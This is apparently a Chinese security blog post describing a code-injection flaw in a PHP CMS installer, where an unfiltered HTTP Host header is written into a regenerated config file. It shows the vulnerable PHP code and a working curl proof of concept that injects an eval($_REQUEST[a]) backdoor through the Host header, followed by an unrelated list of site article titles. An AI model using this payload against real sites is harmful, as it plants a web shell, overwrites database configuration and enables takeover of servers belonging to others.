注入:
之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

鸡肋1: 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2: 有一定安全常识的站长都会删掉 install 目录

虽然鸡肋 但也有优点 : 不受 magic_quotes_gpc 、 webserver 影响

分析:

$siteurl="http://".$_SERVER["HTTP_HOST"]."/"; //未过滤

$filestr = fread(fopen($SysConfigFile, 'r'),30000);

$filestr=str_replace(" ","",$filestr);

$filestr=str_replace("DefaultDbHost",$dbhost,$filestr);

$filestr=str_replace("DefaultDbName",$dbname,$filestr);

$filestr=str_replace("DefaultDbUser",$dbuser,$filestr);

$filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);

$filestr=str_replace("DefaultsLan","zh_cn",$filestr);

$filestr=str_replace("DefaultTablePre",$tablepre,$filestr);

$filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

fwrite(fopen($ConFile,"w"),$filestr,30000);

$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

poc

curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

最新文章

  1. Google Map API Version3 :代码添加和删除marker标记
  2. Spark-1.5.1 on CDH-5.4.7
  3. 【转】CSS3动画帧数科学计算法
  4. 破解TexturePacker加密资源
  5. ichat在线客服jQuery插件(可能是历史上最灵活的)
  6. DROP TABLE ** CASCADE CONSTRAINTS PURGE删除表的时候级联删除从表外键
  7. JS正则表达式获取字符串中特定字符
  8. 探索WebKit内核(一)------ 菜鸟起步
  9. C/C++ 指针的非空判断
  10. Android进程
  11. JDK API文档中,<E>、<T>、<?>分别代表什么意思?
  12. 4、C#基础 - C# 的 常见概念简述
  13. oracle学习笔记第三天
  14. linux中top命令使用及查看tcp连接
  15. Linux 安装 mysql 数据库
  16. redhat6.4 elasticsearch1.7.3安装配置
  17. LR_问题_虚拟用户以进程和线程模式运行的区别
  18. POJ 3414 Pots(BFS+回溯)
  19. jvm 内存调整
  20. string ids=aduuids.Aggregate("", (m, n) => m + n+",").TrimEnd(',');

热门文章

  1. Codeforces 714C. Sonya and Queries Tire树
  2. ADB 常用命令总结(持续更新)
  3. Intellij idea 设置svn 父目录文件显示状态颜色
  4. Hadoop中HDFS的管理
  5. StringGrid 实例5 本例功能:字体修改为居中,红色,20号
  6. php获得ip地址
  7. eclips android项目复制
  8. 12.我们不是在真空里谈软件工程, 软件要运行在硬件芯片上面, 下面看看一个计算机芯片的发展历史: http://perspectives.mvdirona.com/2014/09/august-21-2014-computer-history-museum-presentation/ http://mvdirona.com/jrh/TalksAndPapers/DileepBhandar
  9. log4j2自定义输出线程环境信息
  10. 【shell脚本】显示文件的偶数或奇数行